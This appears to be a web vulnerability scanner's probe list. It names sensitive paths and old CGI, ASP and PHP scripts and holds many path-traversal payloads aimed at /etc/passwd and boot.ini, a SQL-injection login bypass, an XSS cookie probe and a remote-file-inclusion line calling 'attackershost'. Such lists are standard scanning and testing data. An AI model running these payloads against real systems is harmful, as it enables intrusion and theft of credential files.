/sample/
/samples/
/save/
/scr/
/scratch
/scripts/weblog
/search.vts
/search97.vts
/secret/
/secure/
/secured/
/sell/
/server_stats/
/service/
/services/
/servicio/
/servicios/
/setup/
/shop/
/shopper/
/software/
/solaris/
/source/
/Sources/
/sql/
/src/
/srchadm
/ss.cfg
/ssi/
/staff/
/stat.htm
/stat/
/statistic/
/statistics/
/Statistics/
/stats.htm
/stats.html
/stats.txt
/Stats/
/stats/
/status/
/store/
/StoreDB/
/stylesheet/
/stylesheets/
/subir/
/sun/
/super_stats/access_logs
/super_stats/error_logs
/support/
/swf
/sys/
/system/
/tar/
/tarjetas/
/temp/
/template/
/temporal/
/test/
/testing/
/tests/
/tmp/
/tools/
/tpv/
/trabajo/
/trafficlog/
/transito/
/tree/
/trees/
/updates/
/user/
/users/
/users/scripts/submit.cgi
/ustats/
/usuario/
/usuarios/
/vfs/
/w3perl/admin
/web/
/web800fo/
/webaccess.htm
/webaccess/access-options.txt
/webadmin/
/webboard/
/webcart-lite/
/webcart/
/webdata/
/weblog/
/weblogs/
/webmaster_logs/
/WebShop/
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/website/
/webstats/
/WebTrend/
/Web_store/
/windows/
/word/
/work/
/wstats/
/wusage/
/www-sql/
/www/
/wwwboard/wwwboard.cgi
/wwwboard/wwwboard.pl
/wwwjoin/
/wwwlog/
/wwwstats.html
/wwwstats/
/wwwthreads/3tvars.pm
/wwwthreads/w3tvars.pm
/zipfiles/
/cgi-bin/.fhp
/cgi-bin/adduser.cgi
/cgi-bin/add_ftp.cgi
/cgi-bin/admin.cgi
/cgi-bin/admin.php
/cgi-bin/admin.php3
/cgi-bin/admin.pl
/cgi-bin/adminhot.cgi
/cgi-bin/adminwww.cgi
/cgi-bin/amadmin.pl
/cgi-bin/AnyBoard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm2
/cgi-bin/AT-generate.cgi
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/axs.cgi
/cgi-bin/bb-histlog.sh
/cgi-bin/bbs_forum.cgi
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/bsguest.cgi
/cgi-bin/bslist.cgi
/cgi-bin/bulk/bulk.cgi
/cgi-bin/cached_feed.cgi
/cgi-bin/calender_admin.pl
/cgi-bin/cart.pl
/cgi-bin/cartmanager.cgi
/cgi-bin/cbmc/forums.cgi
/cgi-bin/cgimail.exe
/cgi-bin/change-your-password.pl
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/clickcount.pl?view=test
/cgi-bin/clickresponder.pl
/cgi-bin/code.php
/cgi-bin/code.php3
/cgi-bin/commandit.cgi
/cgi-bin/count.cgi
/cgi-bin/counter-ord
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/counterfiglet-ord
/cgi-bin/counterfiglet/nc/
/cgi-bin/cstat.pl
/cgi-bin/c_download.cgi
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/db_manager.cgi
/cgi-bin/DCFORMS98.CGI
/cgi-bin/dfire.cgi
/cgi-bin/dig.cgi
/cgi-bin/displayTC.pl
/cgi-bin/dnewsweb
/cgi-bin/donothing
/cgi-bin/edit.pl
/cgi-bin/enter.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/ex-logger.pl
/cgi-bin/excite
/cgi-bin/filemail
/cgi-bin/filemail.pl
/cgi-bin/ftp.pl
/cgi-bin/gbook/gbook.cgi
/cgi-bin/getdoc.cgi
/cgi-bin/glimpse
/cgi-bin/hitview.cgi
/cgi-bin/ikonboard/help.cgi?
/cgi-bin/jj
/cgi-bin/journal.cgi?folder=journal.cgi%00
/cgi-bin/log-reader.cgi
/cgi-bin/log/
/cgi-bin/login.cgi
/cgi-bin/login.pl
/cgi-bin/logit.cgi
/cgi-bin/logs.pl
/cgi-bin/logs/
/cgi-bin/logs/access_log
/cgi-bin/logs/error_log
/cgi-bin/lookwho.cgi
/cgi-bin/maillist.cgi
/cgi-bin/maillist.pl
/cgi-bin/majordomo.pl
/cgi-bin/man.sh
/cgi-bin/meta.pl
/cgi-bin/minimal.exe
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
/cgi-bin/nlog-smb.cgi
/cgi-bin/nlog-smb.pl
/cgi-bin/nph-maillist.pl
/cgi-bin/nph-publish
/cgi-bin/ntitar.pl
/cgi-bin/pass
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/php-cgi
/cgi-bin/pollssi.cgi
/cgi-bin/postcards.cgi
/cgi-bin/post_query
/cgi-bin/profile.cgi
/cgi-bin/pu3.pl
/cgi-bin/ratlog.cgi
/cgi-bin/replicator/webpage.cgi/
/cgi-bin/responder.cgi
/cgi-bin/rguest.exe
/cgi-bin/rightfax/fuwww.dll/?
/cgi-bin/rmp_query
/cgi-bin/robpoll.cgi
/cgi-bin/scripts/*%0a.pl
/cgi-bin/search.cgi
/cgi-bin/search.pl
/cgi-bin/session/adminlogin
/cgi-bin/show.pl
/cgi-bin/stat/
/cgi-bin/stats-bin-p/reports/index.html
/cgi-bin/stats.pl
/cgi-bin/stats.prf
/cgi-bin/stats/
/cgi-bin/statsconfig
/cgi-bin/stats_old/
/cgi-bin/statview.pl
/cgi-bin/survey
/cgi-bin/survey.cgi
/cgi-bin/tablebuild.pl
/cgi-bin/test.cgi
/cgi-bin/test/test.cgi
/cgi-bin/textcounter.pl
/cgi-bin/tidfinder.cgi
/cgi-bin/tigvote.cgi
/cgi-bin/tpgnrock
/cgi-bin/ultraboard.cgi
/cgi-bin/ultraboard.pl
/cgi-bin/Upload.pl
/cgi-bin/viewlogs.pl
/cgi-bin/visitor.exe
/cgi-bin/w3-msql
/cgi-bin/w3-sql
/cgi-bin/webais
/cgi-bin/webbbs.cgi
/cgi-bin/webbbs.exe
/cgi-bin/webutil.pl
/cgi-bin/webutils.pl
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/www-sql
/cgi-bin/wwwboard.cgi.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/wwwstats.pl
/cgi-bin/wwwthreads/3tvars.pm
/cgi-bin/wwwthreads/w3tvars.pm
/abonnement.asp
/acartpath/signin.asp?|-|0|404_Object_Not_Found
/add_acl
/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
/admin/auth.php
/admin/cfg/configscreen.inc.php+
/admin/cfg/configsite.inc.php+
/admin/cfg/configsql.inc.php+
/admin/cfg/configtache.inc.php+
/admin/cms/htmltags.php
/admin/credit_card_info.php
/admin/exec.php3
/admin/index.php
/admin/modules/cache.php+
/admin/objects.inc.php4
/admin/script.php
/admin/settings.inc.php+
/admin/templates/header.php
/admin/upload.php
/admin_t/include/aff_liste_langue.php
/adv/gm001-mc/
/aff_news.php
/approval/ts_app.htm
/archive.asp
/archive_forum.asp
/ashnews.php
/auth.inc.php
/b2-tools/gm-2-b2.php
/bandwidth/index.cgi
/basilix.php3
/bigsam_guestbook.php?displayBegin=9999...9999
/bin/common/user_update_passwd.pl
/biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
/biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
/board/index.php
/board/philboard_admin.asp+
/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
/bugtest+/+
/caupo/admin/admin_workspace.php
/ccbill/whereami.cgi
/cfdocs.map
/chat_dir/register.php
/checkout_payment.php
/communique.asp
/community/forumdisplay.php
/community/index.php?analized=anything
/community/member.php
/compte.php
/config/html/cnf_gi.htm
/convert-date.php
/cp/rac/nsManager.cgi
/CSNews.cgi
/csPassword.cgi?command=remove%20
/cutenews/comments.php
/cutenews/search.php
/cutenews/shownews.php
/Data/settings.xml+
/database/metacart.mdb+
/db.php
/dbabble
/dcp/advertiser.php
/defines.php
/dltclnt.php
/doc/admin/index.php
/docs/NED
/dotproject/modules/files/index_table.php
/dotproject/modules/projects/addedit.php
/dotproject/modules/projects/view.php
/dotproject/modules/projects/vw_files.php
/dotproject/modules/tasks/addedit.php
/dotproject/modules/tasks/viewgantt.php
/do_map
/do_subscribe
/email.php
/emml_email_func.php
/emumail.cgi?type=.%00
/entete.php
/enteteacceuil.php
/etc/shadow+
/eventcal2.php.php
/ez2000/ezadmin.cgi
/ez2000/ezboard.cgi
/ez2000/ezman.cgi
/faqman/index.php
/filemanager/index.php3
/filemgmt/brokenfile.php
/filemgmt/singlefile.php
/filemgmt/viewcat.php
/filemgmt/visit.php
/foro/YaBB.pl
/forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
/forum-ra.asp?n=../../../../../../../../../etc/passwd
/forum-ra.asp?n=../../../../../../../../../etc/passwd%00
/forum-ra.asp?n=/../../../../../../../../../../../boot.ini
/forum-ra.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini
/forum-ra.asp?n=/etc/passwd
/forum-ra.asp?n=/etc/passwd%00
/forum-ra.asp?n=c:\\boot.ini
/forum-ra_professionnel.asp?n=%60/etc/passwd%60
/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
/forum-ra_professionnel.asp?n=../../boot.ini
/forum-ra_professionnel.asp?n=/....../boot.ini
/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
/forum-ra_professionnel.asp?n=/../../../etc/passwd
/forum-ra_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini
/forum-ra_professionnel.asp?n=/etc/passwd
/forum-ra_professionnel.asp?n=/etc/passwd%00
/forum-ra_professionnel.asp?n=c:\\boot.ini
/forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
/forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum.asp?n=c:\\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
/forum/mainfile.php
/forum/member.php
/forum/newreply.php
/forum/newthread.php
/forum/viewtopic.php
/forum1.asp?n=%60/etc/passwd%60&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=/....../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=/../../../../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=/../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=/etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=/etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1.asp?n=1753&nn=%60/etc/passwd%60
/forum1.asp?n=1753&nn=....//....//....//....//....//....//....//etc.passwd
/forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd
/forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00
/forum1.asp?n=1753&nn=/....../boot.ini
/forum1.asp?n=1753&nn=/..../boot.ini
/forum1.asp?n=1753&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
/forum1.asp?n=1753&nn=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini
/forum1.asp?n=1753&nn=/etc/passwd
/forum1.asp?n=1753&nn=/etc/passwd%00
/forum1.asp?n=1753&nn=c:\\boot.ini
/forum1.asp?n=c:\\boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=/....../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1
/forum1_professionnel.asp?n=1771&nn=....//....//....//....//....//....//....//etc.passwd&page=1
/forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1
/forum1_professionnel.asp?n=1771&nn=/....../boot.ini&page=1
/forum1_professionnel.asp?n=1771&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&page=1
/forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1
/forum1_professionnel.asp?n=1771&nn=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini&page=1
/forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1
/forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1
/forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60
/forum1_professionnel.asp?n=1771&nn=100&page=....//....//....//....//....//....//....//etc.passwd
/forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00
/forum1_professionnel.asp?n=1771&nn=100&page=/....../boot.ini
/forum1_professionnel.asp?n=1771&nn=100&page=/..../boot.ini
/forum1_professionnel.asp?n=1771&nn=100&page=/.../.../.../.../.../.../boot.ini
/forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../../../../../../../../../../../boot.ini
/forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd
/forum1_professionnel.asp?n=1771&nn=100&page=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini
/forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd
/forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00
/forum1_professionnel.asp?n=1771&nn=100&page=c:\\boot.ini
/forum1_professionnel.asp?n=1771&nn=c:\\boot.ini&page=1
/forum1_professionnel.asp?n=c:\\boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
/forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
/forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_arc.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_arc.asp?n=268
/forum_arc.asp?n=c:\\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
/forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
/forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/forum_professionnel.asp?n=100
/forum_professionnel.asp?n=c:\\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
/functions.inc.php+
/gallery/captionator.php
/get_od_toc.pl
/globals.php3
/globals.pl
/Gozila.cgi
/helperfunction.php
/homebet/homebet.dll?form=menu&option=menu-signin
/htmltonuke.php
/idealbb/error.asp?|-|0|404_Object_Not_Found
/iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found
/imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
/imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/imprimer.asp?no=c:\\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
/include/customize.php
/include/help.php
/include/help.php
/includes/footer.php3
/includes/header.php3
/index.php?base=test%20
/index.php?IDAdmin=test
/index.php?pymembs=admin
/index.php?SqlQuery=test%20
/index.php?tampon=test%20
/index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20
/infos/contact/index.asp
/infos/faq/index.asp
/infos/gen/index.asp
/infos/services/index.asp
/instaboard/index.cfm
/intranet/browse.php
/invitefriends.php3
/ipchat.php
/ixmail_netattach.php
/jsptest.jsp+
/kernel/class/delete.php
/kernel/classes/ezrole.php
/ldap.search.php3?ldap_serv=nonsense%20
/livredor/index.php
/login.php3?reason=chpass2%20
/mail/include.html
/mail/settings.html
/mail/src/read_body.php
/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
/mambo/banners.php
/manage/login.asp+
/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
/members/ID.pm
/members/ID.xbb
/mlog.html
/mod.php
/modif/delete.php
/modif/ident.php
/modif_infos.asp?n=%60/etc/passwd%60
/modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
/modif_infos.asp?n=../../../../../../../../../etc/passwd%00
/modif_infos.asp?n=/....../boot.ini
/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
/modif_infos.asp?n=/../../../../../../../../../etc/passwd
/modif_infos.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini
/modif_infos.asp?n=/etc/passwd
/modif_infos.asp?n=/etc/passwd%00
/modif_infos.asp?n=c:\\boot.ini
/modules/Downloads/voteinclude.php+
/modules/Forums/attachment.php
/modules/Search/index.php
/modules/WebChat/in.php+
/modules/WebChat/out.php
/modules/WebChat/quit.php
/modules/WebChat/users.php
/modules/Your_Account/navbar.php+
/moregroupware/modules/webmail2/inc/
/msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
/myguestBk/add1.asp?|-|0|404_Object_Not_Found
/myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
/myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
/netget?sid=Safety&msg=2002&file=Safety
/newtopic.php
/newtopic.php
/nphp/nphpd.php
/OpenTopic
/options.inc.php+
/oscommerce/default.php
/parse_xml.cgi
/pass_done.php
/php/gaestebuch/admin/index.php
/php/php4ts.dll
/pks/lookup
/pm/lib.inc.php
/poppassd.php3+
/produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
/productcart/database/EIPC.mdb
/productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
/ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
/product_info.php
/prometheus-all/index.php
/proplus/admin/login.php+-d+\\\"action=insert\\\"+-d+\\\"username=test\\\"+-d+\\\"password=test\\\"
/protected/
/protected/secret.html+
/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
/protection.php
/pt_config.inc
/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20
/pvote/del.php?pollorder=1%20
/quikmail/nph-emumail.cgi?type=../%00
/room/save_item.php
/rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
/rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
/rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
